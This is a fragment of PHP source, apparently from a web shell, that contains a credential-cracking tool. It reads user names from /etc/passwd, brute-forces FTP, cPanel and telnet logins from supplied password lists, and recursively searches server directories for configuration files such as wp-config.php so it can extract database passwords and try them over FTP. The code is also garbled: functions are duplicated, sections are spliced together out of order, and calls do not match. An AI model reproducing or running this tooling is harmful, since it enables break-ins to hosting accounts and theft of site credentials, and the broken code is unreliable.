function read_dir($path, $username)
{
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath = "{$path}{$file}";
if ($file != '.' and $file != '..') {
if (is_readable($fpath)) {
$dr = "{$fpath}/";
if (is_dir($dr)) {
read_dir($dr, $username);
} else {
if ($file == 'config.php' or $file == 'config.inc.php' or $file == 'db.inc.php' or $file == 'connect.php' or $file == 'wp-config.php' or $file == 'var.php' or $file == 'configure.php' or $file == 'db.php' or $file == 'db_connect.php') {
$pass = get_pass($fpath);
if ($pass != '') {
echo "[+] {$fpath}\n{$pass}\n";
ftp_check($username, $pass);
}
}
}
}
}
}
}
}
if (empty($pass) && $_REQUEST['bruteforce'] != "true") {
print "<p><font face='Comic Sans MS' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>";
exit;
}
$userlist = explode("\n", $users);
$passlist = explode("\n", $pass);
print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">\r\n LETS GAME BEGIN ;) ...</font></b><br><br>";
if (isset($_POST['connect_timeout'])) {
$connect_timeout = $_POST['connect_timeout'];
}
if ($cracktype == "ftp") {
foreach ($userlist as $user) {
$pureuser = trim($user);
foreach ($passlist as $password) {
$purepass = trim($password);
ftp_check($target, $pureuser, $purepass, $connect_timeout);
}
}
}
if ($cracktype == "cpanel" || $cracktype == "cpanel2") {
if ($cracktype == "cpanel2") {
$cpanel_port = "23";
} else {
$cpanel_port = "2082";
}
foreach ($userlist as $user) {
$pureuser = trim($user);
print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">\r\n Please put some good password to crack user {$pureuser} :( ... </font></b>";
if ($_POST['bruteforce'] == "true") {
echo " bruteforcing ..";
echo "<br>";
exit;
} elseif (curl_errno($ch) == 0) {
print "<b>[ user@alturks.com ]# </b>\r\n<b>Attacking has been done , found username , <font color='#FF0000'> {$user} </font> and password , \r\n<font color='#FF0000'> {$pass} </font></b><br>";
}
curl_close($ch);
}
if (isset($submit) && !empty($submit)) {
$userlist = explode("\n", $users);
$passlist = explode("\n", $pass);
print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>";
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password) {
$_pass = trim($password);
if ($option == "ftp") {
ftp_check($target, $_user, $_pass, $connect_timeout);
}
if ($option == "cpanel") {
cpanel_check($target, $_user, $_pass, $connect_timeout);
}
}
}
}
} elseif ($page == 'users') {
echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="' . htmlspecialchars($file) . '"><input type="submit" name="hardstylez" value="grab !"></form>';
$file = $_POST['file'];
$level = 0;
if (!file_exists("file:")) {
@mkdir("file:");
}
function cpanel_crack()
{
set_time_limit(0);
global $os;
echo "<div id=result>";
$cpanel_port = "2082";
$connect_timeout = 5;
if (!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) {
?>
<center>
<form method=post>
<table class=tbl>
<tr>
<td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
</tr>
<tr>
<td align=center>User names</td><td align=center>Password</td>
</tr>
<tr>
<td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
if ($os != "win") {
if (@file('/etc/passwd')) {
$users = file('/etc/passwd');
foreach ($users as $user) {
$user = explode(':', $user);
echo $user[0] . "\n";
}
} else {
$temp = "";
$val1 = 0;
$val2 = 1000;
for (; $val1 <= $val2; $val1++) {
$uid = @posix_getpwuid($val1);
if ($uid) {
$temp .= join(':', $uid) . "\n";
}
}
$temp = trim($temp);
if ($file5 = fopen("test.txt", "w")) {
fputs($file5, $temp);
fclose($file5);
$file = fopen("test.txt", "r");
while (!feof($file)) {
$s = fgets($file);
$matches = array();
$t = preg_match('/\\/(.*?)\\:\\//s', $s, $matches);
$matches = str_replace("home/", "", $matches[1]);
if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
continue;
}
echo $matches;
}
fclose($file);
}
}
}
?>
</textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
</tr>
<tr>
<td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
</tr>
<tr>
<td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
</tr>
<tr>
<td align=center colspan=2><input type="submit" value=" Go " class=but></td>
</tr>
</table>
</form>
</center>
<?php
} else {
if (empty($_POST['username']) || empty($_POST['password'])) {
echo "<center>Please Enter The Users or Password List</center>";
} else {
$userlist = explode("\n", $_POST['username']);
$passlist = explode("\n", $_POST['password']);
if ($_POST['cracktype'] == "ftp") {
foreach ($userlist as $user) {
$pureuser = trim($user);
foreach ($passlist as $password) {
$purepass = trim($password);
ftp_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
}
}
}
if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") {
if ($cracktype == "telnet") {
$cpanel_port = "23";
} else {
$cpanel_port = "2082";
}
foreach ($userlist as $user) {
$pureuser = trim($user);
echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>\n\t\t\t\t\t\tProcessing user {$pureuser} ...</font></b><br><br>";
foreach ($passlist as $password) {
$purepass = trim($password);
cpanel_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
}
}
}
}
}
echo "</div>";
}
function read_dir($path, $username)
{
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath = "{$path}{$file}";
if ($file != '.' and $file != '..') {
if (is_readable($fpath)) {
$dr = "{$fpath}/";
if (is_dir($dr)) {
read_dir($dr, $username);
} else {
if ($file == 'config.php' or $file == 'configuration.php' or $file == 'wp-config.php' or $file == 'config.inc.php' or $file == 'database.php' or $file == 'conf.php' or $file == 'settings.php' or $file == 'setting.php' or $file == 'inc.php' or $file == 'corn.php' or $file == 'configs.php' or $file == 'konfig.php' or $file == 'dbconf.php' or $file == 'koneksi.php' or $file == 'dbconfig.php' or $file == 'db.inc.php' or $file == 'db_connect.php' or $file == 'dbconnect.php' or $file == 'db-connect.php' or $file == 'configure.php' or $file == 'global.php' or $file == 'connect.php' or $file == 'db.php' or $file == 'conf_db.php' or $file == 'database.inc.php' or $file == 'database.php' or $file == 'connection.php' or $file == 'connections.php' or $file == 'configure.class.php' or $file == 'config.class.php' or $file == 'configuration.class.php' or $file == 'db.class.php' or $file == 'file_manager.php' or $file == 'LocalSettings.php' or $file == 'filemanager.php' or $file == 'manager.php' or $file == 'managers.php' or $file == 'connect.inc.php' or $file == 'dbconnect.inc.php') {
$pass = get_pass($fpath);
if ($pass != '') {
echo "[+] {$fpath}\n{$pass}\n";
ftp_check($username, $pass);
}
}
}
}
}
}
}
}
